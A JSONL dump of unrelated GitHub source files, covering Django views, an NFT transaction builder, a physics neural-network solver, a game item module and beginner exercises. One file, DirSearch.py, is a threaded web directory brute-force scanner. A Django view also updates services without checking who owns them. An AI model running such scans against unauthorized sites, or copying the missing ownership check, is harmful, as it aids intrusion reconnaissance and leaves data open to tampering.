basic_price_title\r\n pricestandard.price_number = basic_price\r\n pricestandard.price_delivery = basic_price_delivery\r\n pricestandard.price_description = basic_price_discription\r\n \r\n pricestandard.save()\r\n\r\n standard = PriceStandard.objects.create()\r\n standard.price = pricestandard\r\n standard.save()\r\n\r\n\r\n pricepremium = Price.objects.create()\r\n basic_price_title = request.POST.get('premium_price_title')\r\n basic_price = request.POST.get('premium_price')\r\n basic_price_discription = request.POST.get('premium_price_discription')\r\n basic_price_delivery = request.POST.get('premium_price_delivery')\r\n \r\n pricepremium.price_title = basic_price_title\r\n pricepremium.price_number = basic_price\r\n pricepremium.price_delivery = basic_price_delivery\r\n pricepremium.price_description = basic_price_discription\r\n \r\n pricepremium.save()\r\n\r\n premium = PricePremium.objects.create()\r\n premium.price = pricepremium\r\n premium.save()\r\n\r\n room.pricebasic = pricebasic \r\n room.pricepremium = premium\r\n room.pricestandard = standard\r\n #return redirect('main:home_page')\r\n form.save()\r\n form = AddServiceForm()\r\n else:\r\n context['catagory_selection_error'] = \"Please Select A Catagory\"\r\n \r\n context['allroom'] = form\r\n context['allusers'] = Account.objects.all()\r\n context['catagorys'] = Category.objects.all()\r\n context['other_users'] = get_other_users(request)\r\n return render(request,'main/addroom.html',context)\r\n\r\ndef regiser_view(request):\r\n context = {}\r\n if request.POST:\r\n form = RegistrationForm(request.POST)\r\n genderValue = request.POST.get('genderValue')\r\n print(genderValue) \r\n if form.is_valid():\r\n fr = form.save(commit=False)\r\n if genderValue == 'Male':\r\n #with open('static/images/dummy-profile-image-male.png', 'rb') as f:\r\n #data = f.read()\r\n #print(data,genderValue)\r\n fr.profile_image = 'dummy-profile-image-male.png'\r\n\r\n elif genderValue == 'Female':\r\n fr.profile_image = 'dummy-profile-image-Female.jpg' \r\n fr.save()\r\n email = form.cleaned_data.get('email')\r\n raw_password = form.cleaned_data.get('password1')\r\n account = authenticate(email=email, password=raw_password)\r\n if account:\r\n login(request, account)\r\n return redirect('main:home_page')\r\n else:\r\n context['registration_form'] = form\r\n else:\r\n form = RegistrationForm()\r\n context['registration_form'] = form\r\n return render(request,'main/register.html', context)\r\n\r\ndef login_view(request):\r\n context = {}\r\n user = request.user\r\n email = 'email'\r\n if user.is_authenticated:\r\n return redirect('main:home_page')\r\n if request.POST:\r\n form = AccountAuthonticationForm(request.POST)\r\n if form.is_valid():\r\n email = request.POST['email']\r\n password = request.POST['password']\r\n user = authenticate(email=email, password=password)\r\n if user:\r\n login(request, user)\r\n return redirect('main:home_page')\r\n\r\n else:\r\n form = AccountAuthonticationForm()\r\n\r\n context['login_form'] = form\r\n context['login'] = email\r\n return render(request,'main/login.html',context)\r\n\r\ndef logout_view(request):\r\n logout(request)\r\n return redirect('main:home_page')\r\n\r\ndef single_view(request,singleuser):\r\n users = Room.objects.get(id=singleuser)\r\n if request.POST:\r\n comments = request.POST.get('addComment')\r\n if request.user.is_authenticated:\r\n if comments:\r\n comment = Comment.objects.create() \r\n comment.user = request.user\r\n comment.room = users\r\n comment.comment = comments\r\n comment.save()\r\n comments = ''\r\n Comments = Comment.objects.filter(room=users)\r\n paginator = Paginator(Comments,5)\r\n\r\n try:\r\n page = int(request.GET.get('page','1'))\r\n except:\r\n page = 1\r\n\r\n try:\r\n Comments = paginator.page(page)\r\n except(EmptyPage, InvalidPage):\r\n Comments = paginator.page(paginator.num_pages)\r\n\r\n all_images = []\r\n if users.roomimage1:\r\n all_images.append(users.roomimage1.url)\r\n else:\r\n all_images.append(users.roomimage.url)\r\n if users.roomimage2: \r\n all_images.append(users.roomimage2.url)\r\n if users.roomimage3:\r\n all_images.append(users.roomimage3.url)\r\n if users.roomimage4:\r\n all_images.append(users.roomimage4.url)\r\n\r\n servicess = Room.objects.filter(catagory__categoryname=users.catagory.categoryname).order_by('-total_rate')\r\n services = servicess.filter(~Q(id=singleuser))\r\n catagorys = Category.objects.filter(~Q(categoryname=singleuser))\r\n context = {'Comments':Comments,'users':users,'catagorys':catagorys,\r\n 'coms':Comment.objects.filter(room=users), 'other_users':get_other_users(request)\r\n ,'services':services, 'all_images':all_images}\r\n return render(request,'main/singleview.html',context)\r\n\r\ndef roomdetail_view(request,catagory):\r\n users = Room.objects.filter(catagory__categoryname=catagory).order_by('-total_rate')\r\n catagorys = Category.objects.filter(~Q(categoryname=catagory))\r\n context = {'ids':catagory,'users':users,'catagorys':catagorys,'other_users':get_other_users(request)}\r\n return render(request,'main/roomdetail.html',context)\r\n\r\n\r\ndef roombooking_view(request, slug):\r\n #data = json.loads(request.data)\r\n room_list = Room.objects.filter(~Q(id=slug))\r\n\r\n paginator = Paginator(room_list,3)\r\n\r\n try:\r\n page = int(request.GET.get('page','1'))\r\n except:\r\n page = 1\r\n\r\n try:\r\n rooms = paginator.page(page)\r\n except(EmptyPage, InvalidPage):\r\n rooms = paginator.page(paginator.num_pages)\r\n\r\n context = {}\r\n context['rooms'] = rooms\r\n context['bookroom'] = Room.objects.get(id=slug)\r\n #return JsonResponse('here we go', safe=False)\r\n return render(request,'main/roombooking.html',context)\r\n\r\ndef searchRoom_view(request,slug):\r\n context = {}\r\n search = request.GET.get('search')\r\n context['serachedrooms'] = Room.objects.filter(roomname=search)\r\n return render(request,'main/home.html',context)\r\ndef services_view(request):\r\n context = {}\r\n if request.user.is_authenticated:\r\n user = request.user\r\n context['services'] = Room.objects.filter(room_user=user)\r\n context['other_users'] = get_other_users(request)\r\n return render(request,'main/services.html',context)\r\n\r\ndef serviceupdate_view(request, service_id):\r\n context = {}\r\n if request.user.is_authenticated:\r\n service_id = service_id\r\n service = Room.objects.get(id=service_id)\r\n if request.POST:\r\n\r\n form = UpdateServiceForm(request.POST, request.FILES,instance=service)\r\n #service.roomname = request.POST.get('roomname')\r\n #service.car_price = request.POST.get('car_price')\r\n #service.car_description = request.POST.get('car_description')\r\n catagory = Category.objects.get(categoryname=request.POST.get('catagory'))\r\n service.catagory = catagory\r\n #service.roomimage = request.POST.get('roomimage')\r\n #print(request.POST.get('roomimage'))\r\n #if form.is_valid():\r\n #print(service)\r\n #room = form.save(commit=False)\r\n #room.catagory = catagorys\r\n #room.room_user= request.user\r\n #room.save()\r\n form.save()\r\n service.save()\r\n #form.save()\r\n #form = AddServiceForm()\r\n\r\n #else:\r\n #print(form)\r\n\r\n #service.rate_amount = rate\r\n #service.save(update_fields=['rate_amount'])\r\n context['service'] = service\r\n context['catagorys'] = Category.objects.all()\r\n context['other_users'] = get_other_users(request)\r\n return render(request,'main/serviceupdate.html',context)\r\ndef notfound_view(request):\r\n context = {}\r\n context['other_users'] = get_other_users(request)\r\n return render(request,'main/notfound.html',context)","repo_name":"hiruy535/gebetafreelance","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43825141457","text":"from gas import set_gas_limit, set_base, calculate_gas_max, set_gas_tip\nfrom config import EXPECTED_SALE_PER_UNIT, DESIRED_RETURN, MINT_PRICE_PER_UNIT, \\\n UNITS, WALLET, RECIPIENT_ADDRESS, MINT_FUNCTION, CHAIN, Web3Instance\nfrom constants import WEI_TO_GWEI, ETH_TO_GWEI, MAINNET_ID, RINKEBY_ID\nfrom secrets import WALLETS\nimport time\n\n\ndef generate_transact_tx():\n GAS_LIMIT = 21000\n BASE = 80 # set_base() # return in gwei\n TIP = 40 # get tip from https://etherscan.io/gastracker\n MAX = calculate_gas_max(BASE, TIP)\n VALUE = 0.01\n tx, tx_error = None, None\n\n try:\n\n nonce = Web3Instance.eth.getTransactionCount(WALLETS[WALLET]['public'])\n\n tx = {\n 'nonce': nonce,\n 'to': RECIPIENT_ADDRESS,\n 'value': Web3Instance.toWei(VALUE, 'ether'),\n 'gas': GAS_LIMIT,\n 'maxPriorityFeePerGas': Web3Instance.toWei(TIP, 'gwei'),\n 'maxFeePerGas': Web3Instance.toWei(MAX, 'gwei'),\n 'chainId': CHAIN,\n }\n\n except:\n tx_error = \"Failed to generate transaction.\"\n\n return tx, nonce, tx_error\n","repo_name":"evm-labs/NFT-Minter","sub_path":"src/transact_setup.py","file_name":"transact_setup.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70467901172","text":"from time import sleep\nc=0\nwhile c!=5:\n n1=int(input('Digite um número: '))\n n2=int(input('Outro número: '))\n print('''------- Escolha uma opçao -------\n [1] Somar\n [2] Mutiplicar\n [3] Mostrar maior número\n [4] Escolher novos números\n [5] Sair do programa''')\n c=int(input('>>>>> Escolha sua opção: '))\n if c==1:\n print('O resultado de {} + {} é igual a {}'.format(n1,n2,n1+n2))\n elif c==2:\n print('A mutiplicação entre {} x {} é igual a {}'.format(n1,n2,n1*n2))\n elif c==3:\n if n1>n2:\n mn=n1\n elif n1==n2:\n mn=n1\n else:\n mn=n2\n print('O maior número digitado foi {} '.format(mn))\n elif c==4:\n print('Informe os números novamente:')\n n1=int(input('Primeiro valor: '))\n n2=int(input('Segundo valor: '))\n elif c==5:\n print('Finalizando...')\n else:\n print('Escolha invalida tente novamente')\n sleep(2)\n print('-=-'*20)\n","repo_name":"atico0/python","sub_path":"python_exercicios/ex059.py","file_name":"ex059.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7136083424","text":"import copy\nimport random\nimport time\nimport math\nimport numpy as np\nimport argparse\nimport os\nimport datetime\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as func\nimport torch.optim as optim\nimport torch.cuda\n\n# 変更用オプション\n#################################################################################\n#  d_はデフォルトの略、コマンドからの時は変更できる\nd_EPOCH = 2000\n# 格子点数および粒子数\nd_LATTICE = 11\nd_PARTICLE = 9\n# パラメータ\nd_U = 2\nd_J = 1\n# output アウトプットするデータの名前\nd_OUTPUT_FILE_NAME = \"AAA\"\n# GPUを使う場合'cuda' cpu なら'cpu'\nd_GPU = 'cuda'\n\n################################################################################\n\n# 学習率\nLR = 0.001\nLR_STEP = 1000\nLR_GAMMA = 0.1\nMOMENTUM = 0.95\n# 定数\nMEMO_NAME = \"memo.txt\" # 条件記録用\nSAMPLE_NUM = 1000\nnet_num = 20\nOUTPUT_NAME = \"RESULT\"\nKILL_DATA = 50\n\n\n# ニューラルネットワーク本体を作成\nclass MyModel(nn.Module):\n def __init__(self):\n super().__init__()\n # 全結合ネットワーク\n self.l1 = nn.Linear(LATTICE, net_num)\n self.l2 = nn.Linear(net_num, 2)\n\n def forward(self, x):\n # reluを用いる。\n h1 = torch.tanh(self.l1(x))\n y = self.l2(h1)\n return y\n\n\nclass MyLoss(nn.Module):\n def __init__(self, sample_num):\n super().__init__()\n self.i_vector_array = [np.arange(LATTICE) for i in range(sample_num)]\n self.i_vector_array = np.array(self.i_vector_array)\n self.i_vector_array = torch.from_numpy(self.i_vector_array)\n self.i_vector_array = self.i_vector_array.to(DEVICE)\n\n def forward(self, n_vector_array, cn_array, cn_tensor_1, cn_tensor_2, sample_num):\n cn_tensor_1 = (torch.exp(cn_tensor_1[:, :, 0]) * torch.exp(cn_tensor_1[:, :, 1] * 1j)) / (\n torch.exp(cn_array[:, 0]) * torch.exp(cn_array[:, 1] * 1j))\n cn_tensor_2 = (torch.exp(cn_tensor_2[:, :, 0]) * torch.exp(cn_tensor_2[:, :, 1] * 1j)) / (\n torch.exp(cn_array[:, 0]) * torch.exp(cn_array[:, 1] * 1j))\n return (-J * torch.sum(torch.sqrt(n_vector_array[:, 0:LATTICE - 1] * (n_vector_array[:, 1:LATTICE] + 1)) *\n torch.t(torch.conj(cn_tensor_1))\n + torch.sqrt((n_vector_array[:, 0:LATTICE - 1] + 1) * n_vector_array[:, 1:LATTICE]) *\n torch.t(torch.conj(cn_tensor_2)))\n + J * torch.sum(self.i_vector_array ** 2 * n_vector_array)\n - J * (LATTICE - 1) * torch.sum(self.i_vector_array * n_vector_array)\n + ((LATTICE - 1) ** 2 * J / 4 - U / 2) * torch.sum(n_vector_array)\n + U / 2 * torch.sum(n_vector_array ** 2)) / sample_num\n\n\ndef est_particle(n_vector_array, i, sample_num):\n return torch.sum(n_vector_array[:, i]) / sample_num\n\n\ndef metropolis(sample_num, my_net):\n # GPUを使う場合データを変換する。to(DEVICE)\n # 返すベクトル生成\n n_vector_array = np.zeros([sample_num, LATTICE])\n n_vector_array = torch.from_numpy(n_vector_array).float()\n n_vector_array = n_vector_array.to(DEVICE)\n # 操作用のベクトル\n temp_vector = np.zeros([LATTICE])\n temp_vector = torch.from_numpy(temp_vector).float()\n temp_vector = temp_vector.to(DEVICE)\n\n rand_idx = random.randrange(LATTICE)\n temp_vector[rand_idx] = PARTICLE\n for j in range(PARTICLE * 5):\n temp_vector = shuffle_vector(temp_vector)\n for i in range(sample_num + KILL_DATA):\n new_vector = shuffle_vector(temp_vector)\n a1 = torch.sum(temp_vector != 0)\n a2 = torch.sum(new_vector != 0)\n b1 = my_net(temp_vector)\n b1 = torch.exp(b1[0]) * torch.exp(b1[1] * 1j)\n b2 = my_net(new_vector)\n b2 = torch.exp(b2[0]) * torch.exp(b2[1] * 1j)\n alpha = (abs(b2) / abs(b1)) ** 2 * (a1 / a2)\n if alpha < random.random():\n new_vector = temp_vector\n if i >= KILL_DATA:\n n_vector_array[i - KILL_DATA] = new_vector\n return n_vector_array\n\n\ndef shuffle_vector(n_vector):\n result_n_vector = copy.deepcopy(n_vector)\n while True:\n down = random.randrange(LATTICE)\n if not result_n_vector[down] == 0:\n break\n while True:\n up = random.randrange(LATTICE)\n if not down == up:\n break\n result_n_vector[down] -= 1\n result_n_vector[up] += 1\n return result_n_vector\n\n\ndef make_sample(n_vector_array, sample_num):\n n_vector_tensor_1 = np.zeros([LATTICE - 1, sample_num, LATTICE])\n n_vector_tensor_1 = torch.from_numpy(n_vector_tensor_1).float()\n n_vector_tensor_1 = n_vector_tensor_1.to(DEVICE)\n n_vector_tensor_2 = np.zeros([LATTICE - 1, sample_num, LATTICE])\n n_vector_tensor_2 = torch.from_numpy(n_vector_tensor_2).float()\n n_vector_tensor_2 = n_vector_tensor_2.to(DEVICE)\n for i in range(LATTICE - 1):\n n_vector_tensor_1[i] = copy.deepcopy(n_vector_array)\n n_vector_tensor_1[i, :, i] -= 1\n n_vector_tensor_1[i, :, i + 1] += 1\n n_vector_tensor_2[i] = copy.deepcopy(n_vector_array)\n n_vector_tensor_2[i, :, i] += 1\n n_vector_tensor_2[i, :, i + 1] -= 1\n return n_vector_tensor_1, n_vector_tensor_2\n\n\ndef learning():\n # オプションを表示\n print('GPU: {}'.format(GPU))\n print('# epoch: {}'.format(EPOCH))\n print('# lattice_point_num: {}'.format(LATTICE))\n print('# particle_num: {}'.format(PARTICLE))\n print('# output_file: {}'.format(OUTPUT_FILE_NAME))\n print('')\n\n if not os.path.exists(OUTPUT_FILE_NAME):\n os.mkdir(OUTPUT_FILE_NAME)\n # 後からわかるようにメモを出力\n with open(OUTPUT_FILE_NAME + \"/\" + MEMO_NAME, mode='a') as f:\n now_time = datetime.datetime.now()\n f.write(\"\\n\" + __file__ + \"が実行されました。 \" + now_time.strftime('%Y/%m/%d %H:%M:%S') + \"\\n 使用されたデータ:\")\n f.write(\"エポック数:\" + str(EPOCH) + \"\\n \")\n f.write(\"GPU:\" + str(GPU) + \"\\n \")\n f.write(\"lattice_point_num:\" + str(LATTICE) + \"\\n \")\n f.write(\"particle_num:\" + str(PARTICLE) + \"\\n \")\n f.write(\"Lr:\" + str(LR) + \"\\n \")\n f.write(\"STEP:\" + str(LR_STEP) + \"\\n \")\n f.write(\"Gamma:\" + str(LR_GAMMA) + \"\\n \")\n f.write(\"Momentum:\" + str(MOMENTUM) + \"\\n \")\n print(\"データロード開始\")\n\n # ニューラルネットワークを実体化\n my_net: nn.Module = MyModel()\n my_net = my_net.to(DEVICE)\n # 最適化アルゴリズム\n optimizer = optim.SGD(params=my_net.parameters(), lr=LR, momentum=MOMENTUM)\n scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=LR_STEP, gamma=LR_GAMMA)\n\n criterion = MyLoss(SAMPLE_NUM)\n\n # 学習結果の保存用\n history = {'train_loss': [], 'test_loss': [], 'now_time': [], }\n\n # 学習開始。エポック数だけ学習を繰り返す。\n for e in range(EPOCH):\n # 学習を行う。\n my_net.eval()\n with torch.no_grad():\n train_n_vector_array = metropolis(SAMPLE_NUM, my_net)\n train_n_vector_tensor_1, train_n_vector_tensor_2 = make_sample(train_n_vector_array, SAMPLE_NUM)\n my_net.train(True)\n optimizer.zero_grad()\n cn_array = my_net(train_n_vector_array)\n cn_tensor_1 = my_net(train_n_vector_tensor_1)\n cn_tensor_2 = my_net(train_n_vector_tensor_2)\n energy = criterion(train_n_vector_array, cn_array, cn_tensor_1, cn_tensor_2, SAMPLE_NUM)\n energy.backward()\n optimizer.step()\n train_loss = energy.item()\n scheduler.step()\n # テストを行う。\n if e % 10 == 0:\n history['train_loss'].append(train_loss)\n my_net.eval()\n with torch.no_grad():\n test_n_vector_array = metropolis(SAMPLE_NUM, my_net)\n test_n_vector_tensor_1, test_n_vector_tensor_2 = make_sample(test_n_vector_array, SAMPLE_NUM)\n cn_array = my_net(test_n_vector_array)\n cn_tensor_1 = my_net(test_n_vector_tensor_1)\n cn_tensor_2 = my_net(test_n_vector_tensor_2)\n energy = criterion(test_n_vector_array, cn_array, cn_tensor_1, cn_tensor_2, SAMPLE_NUM)\n test_loss = energy.item()\n history['test_loss'].append(test_loss)\n # 経過を記録して、表示。\n now_time = datetime.datetime.now()\n history['now_time'].append(now_time.strftime('%Y/%m/%d %H:%M:%S'))\n print('Train Epoch: {}/{} \\t TrainLoss: {:.6f} \\t TestLoss: {:.6f} \\t time: {} \\t lr:{}'\n .format(e + 1, EPOCH, train_loss, test_loss, now_time.strftime('%Y/%m/%d %H:%M:%S'),\n scheduler.get_last_lr()[0]))\n\n print(\"学習終了\")\n # 予測を行う。\n my_net.eval()\n n_vector_result = np.zeros([LATTICE])\n with torch.no_grad():\n est_n_vector_array = metropolis(SAMPLE_NUM * 10, my_net)\n est_n_vector_tensor_1, est_n_vector_tensor_2 = make_sample(est_n_vector_array, SAMPLE_NUM * 10)\n cn_array = my_net(est_n_vector_array)\n cn_tensor_1 = my_net(est_n_vector_tensor_1)\n cn_tensor_2 = my_net(est_n_vector_tensor_2)\n energy = criterion(est_n_vector_array, cn_array, cn_tensor_1, cn_tensor_2, SAMPLE_NUM * 10)\n for i in range(LATTICE):\n n_vector_result[i] = est_particle(est_n_vector_array, i, SAMPLE_NUM * 10)\n est_loss = energy.item()\n\n # 結果をセーブする。\n if not os.path.exists(args.out + \"/\" + OUTPUT_NAME):\n os.mkdir(args.out + \"/\" + OUTPUT_NAME)\n torch.save(my_net.state_dict(), args.out + \"/\" + OUTPUT_NAME + \"/\" + 'model.pth')\n with open(args.out + \"/\" + OUTPUT_NAME + \"/\" + 'result.txt', mode='a') as f:\n f.write(\"\\n \\n \" + str(est_loss))\n f.write(\"\\n \\n \" + str(n_vector_result))\n with open(args.out + \"/\" + OUTPUT_NAME + \"/\" + 'history.txt', mode='a') as f:\n f.write(\"\\n \\n \" + str(history))\n\n print(\"終了\")\n # 終了時間メモ\n now_time = datetime.datetime.now()\n with open(args.out + \"/\" + MEMO_NAME, mode='a') as f:\n f.write(\"\\n終了しました\" + now_time.strftime('%Y/%m/%d %H:%M:%S') + \"\\n\\n\")\n\n return str(est_loss), str(n_vector_result)\n\n\nif __name__ == '__main__':\n # コマンドラインからプログラムを動かす時のオプションを実装\n parser = argparse.ArgumentParser(description='Pytorch' + __file__)\n parser.add_argument('--epoch', '-e', type=int, default=d_EPOCH,\n help='Number of sweeps over the dataset to train')\n parser.add_argument('--gpu', '-g', type=str, default=d_GPU,\n help='if you want to use GPU, select cuda. cpu for cpu')\n parser.add_argument('--M', '-m', default=d_LATTICE,\n help='number of lattice points')\n parser.add_argument('--N', '-n', default=d_PARTICLE,\n help='number of particle')\n parser.add_argument('--U', '-u', default=d_U,\n help='value of U')\n parser.add_argument('--J', '-j', default=d_J,\n help='value of J')\n parser.add_argument('--out', '-o', default=d_OUTPUT_FILE_NAME,\n help='output file name')\n args = parser.parse_args()\n\n EPOCH = args.epoch\n GPU = args.gpu\n LATTICE = args.M\n PARTICLE = args.N\n U = args.U\n J = args.J\n OUTPUT_FILE_NAME = args.out\n DEVICE = torch.device(GPU)\n\n result = learning()\n print(\"ene\" + result[0])\n print(\"num\" + result[1])\n \"\"\" \n aaa = MyModel()\n aaa.to(DEVICE)\n ddd = MyLoss(SAMPLE_NUM)\n ggg = optim.SGD(params=aaa.parameters(), lr=LR, momentum=MOMENTUM)\n start = time.time()\n bb1 = metropolis(SAMPLE_NUM, aaa)\n print(\"metro:{0}\".format(time.time() - start) + \"[sec]\")\n start = time.time()\n bb2, bb3 = make_sample(bb1, SAMPLE_NUM)\n print(\"make:{0}\".format(time.time() - start) + \"[sec]\")\n start = time.time()\n cc1 = aaa(bb1)\n cc2 = aaa(bb2)\n cc3 = aaa(bb3)\n print(\"net:{0}\".format(time.time() - start) + \"[sec]\")\n start = time.time()\n fff = ddd(bb1, cc1, cc2, cc3, SAMPLE_NUM)\n print(\"loss:{0}\".format(time.time() - start) + \"[sec]\")\n start = time.time()\n fff.backward()\n print(\"backward:{0}\".format(time.time() - start) + \"[sec]\")\n start = time.time()\n ggg.step()\n print(\"optim:{0}\".format(time.time() - start) + \"[sec]\")\n print(fff)\n \"\"\"\n","repo_name":"WATABE-Shintaro/Bose_Hubbard_model","sub_path":"New_NBH/NBH_B.py","file_name":"NBH_B.py","file_ext":"py","file_size_in_byte":12503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42985412140","text":"number=int(input())\n\ndef multiplesOf3And5(number):\n i=0;\n sum0=0;\n sum1=0;\n sumBoth=0\n while i' + url + '')\n result.write('\\r\\n
')\n result.close()\n except Exception:\n pass\n\n def msg(self):\n per = 100 - (float(self._queue.qsize()) / float(self._total) * 100)\n percent = \"%s Finished| %s All| Scan in %1.f %s\" % ((self._total - self._queue.qsize()), self._total, per, '%')\n sys.stdout.write('\\r' + '[*]' + percent)\n\n def start(self):\n result = open('result.html', 'w')\n result.close()\n queue = Queue()\n f = open('dict.txt', 'r')\n for i in f.readlines():\n queue.put(self.url + \"/\" + i.rstrip('\\n'))\n total = queue.qsize()\n threads = []\n thread_count = int(self.count)\n for i in range(thread_count):\n threads.append(self.DirScan(queue, total))\n for thread in threads:\n thread.start()\n for thread in threads:\n thread.join()\n\n\ndef get_user_agent():\n user_agent_list = [\n {},\n {},\n {},\n {},\n ]\n return random.choice(user_agent_list)\n\n\ndef main():\n print('''\n \n \n \n \n Welcome to WebDirscan\n Version:1.0 Author:%s\n '''%__author__)\n parser = OptionParser('python WebDirScan.py -u -f [-t ]')\n parser.add_option('-u', '--url', dest='url', type='string', help='target url for scan')\n parser.add_option('-f', '--file', dest='file_name', type='string', help='dictionary filename')\n parser.add_option('-t', '--thread', dest='count', type='int', default=10, help='scan thread count')\n options, args = parser.parse_args()\n if options.url and options.file_name:\n dirscan = WebDirScan(options)\n dirscan.start()\n sys.exit(1)\n else:\n parser.print_help()\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"HKirito/DirSearch","sub_path":"DirSearch.py","file_name":"DirSearch.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17771426212","text":"from src import constants, globalvars, game\n\n\nclass ComItem:\n \"\"\"Item component that gives actor objects item-like properties and functionality.\n\n Attributes\n ----------\n item_desc : str\n A description of the item.\n weight : int, optional\n The weight value in wu (weight units) of the item.\n item_type : str, optional\n Type of item (gold, consumable, magic, equipment, etc.)\n use_function : function, optional\n Function that's executed when item is used.\n value : int, optional\n Value of the item if it holds one (gold, exp etc.).\n container : ComContainer\n The specific container object the item resides in. Initialized to None.\n \"\"\"\n def __init__(self, item_desc, weight=0,\n item_type=None,\n use_function=None,\n value=0):\n\n self.item_desc = item_desc\n self.weight = weight\n self.item_type = item_type\n self.use_function = use_function\n self.value = value\n self.container = None\n self.hover_sound_played = False\n\n def pick_up(self, actor):\n \"\"\"Picks up the item and either places it into the `actor`'s inventory, or directly used upon picking up.\n\n Parameters\n ----------\n actor : ObjActor\n The actor object (usually PLAYER) that will hold the item after pick up.\n\n Returns\n -------\n None\n \"\"\"\n if self.item_type == \"gold\":\n globalvars.ASSETS.sfx_coin_pickup.play()\n actor.gold += self.value\n\n self.owner.animation_del()\n globalvars.GAME.current_objects.remove(self.owner)\n\n game.game_message(f\"Gained {self.value} gold.\", constants.COLOR_YELLOW)\n game.game_message(f\"Player now has {actor.gold} gold total.\", constants.COLOR_WHITE)\n return\n\n elif self.item_type == \"Red Soul\":\n globalvars.ASSETS.sfx_soul_consume.play()\n actor.exp_total += self.value\n\n self.owner.animation_del()\n globalvars.GAME.current_objects.remove(self.owner)\n return\n\n if actor.container:\n if self.item_type == \"Pure Soul\":\n globalvars.ASSETS.sfx_pure_soul_consume.play()\n actor.container.inventory.append(self.owner)\n self.container = actor.container\n self.use()\n globalvars.GAME.current_objects.remove(self.owner)\n return\n\n if actor.container.weight + self.weight > actor.container.max_weight:\n game.game_message(\"Not enough room to pick up\", constants.COLOR_WHITE)\n\n else:\n globalvars.ASSETS.sfx_item_pickup.play()\n game.game_message(f\"Picked up [{self.owner.display_name}]\")\n actor.container.inventory.append(self.owner)\n\n self.owner.animation_del()\n globalvars.GAME.current_objects.remove(self.owner)\n\n self.container = actor.container\n\n def drop(self, new_x, new_y):\n \"\"\"Drops this item onto the ground specified by the (`new_x`,`new_y`) map-grid coordinates.\n\n Parameters\n ----------\n new_x : int\n The map-grid x-coord to drop the item (usually PLAYER's current position).\n new_y : int\n The map-grid y-coord to drop the item (usually PLAYER's current position).\n\n Returns\n -------\n None\n \"\"\"\n\n # inserting underneath any creature or PLAYER but above any objects already on that tile\n insert_position = 0\n for i, obj in enumerate(reversed(globalvars.GAME.current_objects)):\n if obj.item and obj.x == new_x and obj.y == new_y:\n insert_position = i\n break\n\n globalvars.GAME.current_objects.insert(insert_position, self.owner)\n\n self.owner.animation_init()\n\n if self.owner in self.container.inventory:\n self.container.inventory.remove(self.owner)\n elif self.owner in self.container.equipped_inventory:\n self.container.equipped_inventory.remove(self.owner)\n\n self.owner.x, self.owner.y = new_x, new_y\n game.game_message(f\"Dropped [{self.owner.display_name}]\")\n\n def use(self):\n \"\"\"Uses the item to produce an effect and removes it from the inventory.\n\n Passes in the caster (the creature/actor using the item) and any value associated to the\n use_function.\n\n Returns\n -------\n None\n \"\"\"\n if self.owner.equipment:\n self.owner.equipment.toggle_equip()\n return\n\n if self.use_function:\n used = self.use_function(self.container.owner, self.value)\n if used:\n self.container.inventory.remove(self.owner)\n elif self.item_type == \"Pure Soul\":\n self.container.inventory.remove(self.owner)\n\n\nclass ComEquipment:\n \"\"\"Equipment component class that gives item objects extra combat bonuses and statuses.\n\n Attributes\n ----------\n attack_bonus : int\n Value of additional damage a wielder will gain when equipped.\n defence_bonus : int\n Value of additional defence a wielder will gain when equipped.\n slot : str\n The slot that the equipment will occupy (Right, Left, Body, Legs, Feet, Head).\n equipped : bool\n True if the item is equipped.\n \"\"\"\n def __init__(self, attack_bonus=0, defence_bonus=0, slot=None):\n\n self.attack_bonus = attack_bonus\n self.defence_bonus = defence_bonus\n self.slot = slot\n\n self.equipped = False\n\n def toggle_equip(self):\n \"\"\"Toggles the equipment on and off.\n\n Returns\n -------\n None\n \"\"\"\n if self.equipped:\n self.unequip()\n else:\n self.equip()\n\n def equip(self):\n \"\"\"Equips the item and sets the equipped attribute to True.\n\n Checks the slot of the equipment to see if that particular slot is already occupied.\n If the slot is empty, set equipped attribute to true.\n\n Returns\n -------\n None\n \"\"\"\n all_equipped_items = self.owner.item.container.equipped_inventory\n\n if len(all_equipped_items) > 0:\n for equipped_item in all_equipped_items:\n if equipped_item.equipment.slot == self.slot:\n game.game_message(f\"There is already an item in the {self.slot} slot!\",\n constants.COLOR_WHITE)\n self.equipped = False\n return\n\n self.equipped = True\n game.game_message(f\"Equipped [{self.owner.object_name}] in the {self.slot} slot\")\n\n def unequip(self):\n \"\"\"Unequips the item and sets the equipped attribute to False.\n\n Returns\n -------\n None\n \"\"\"\n self.equipped = False\n game.game_message(f\"Unequipped [{self.owner.display_name}]\")\n","repo_name":"PeterBohai/tower-of-rak","sub_path":"src/components/itemcom.py","file_name":"itemcom.py","file_ext":"py","file_size_in_byte":7006,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"18162804993","text":"def get_holiday(sdate):\n\n\t''' Function get holiday from file plugins/date.txt and return title of\n\tholiday if holiday found, else return empty unicode message. Input params\n\tmust be\tlist of int\n\n\t:[month, day]:'''\n\n\tresult = ''\n\tdate_base = readfile(date_file).decode('UTF').split('\\n')\n\tfor ddate in date_base:\n\t\tif ddate != '\\n' or ddate != '':\n\t\t\tddate = ddate.split('-')\n\t\t\thdate = ddate[0]\n\t\t\tif '.' in hdate:\n\t\t\t\thdate = map(int, hdate.split('.'))\n\t\t\t\thdate.reverse()\n\t\t\t\tif hdate == sdate:\n\t\t\t\t\tresult += ddate[1].strip() + ', '\n\tif len(result) > 2: result = result[:-2]\n\treturn result\n\ndef parse_date_string(string_date, spl='.'):\n\n\t''' Parse date string and return list [year, month, day] '''\n\n\tdate_formats = ['%d'+spl+'%m', 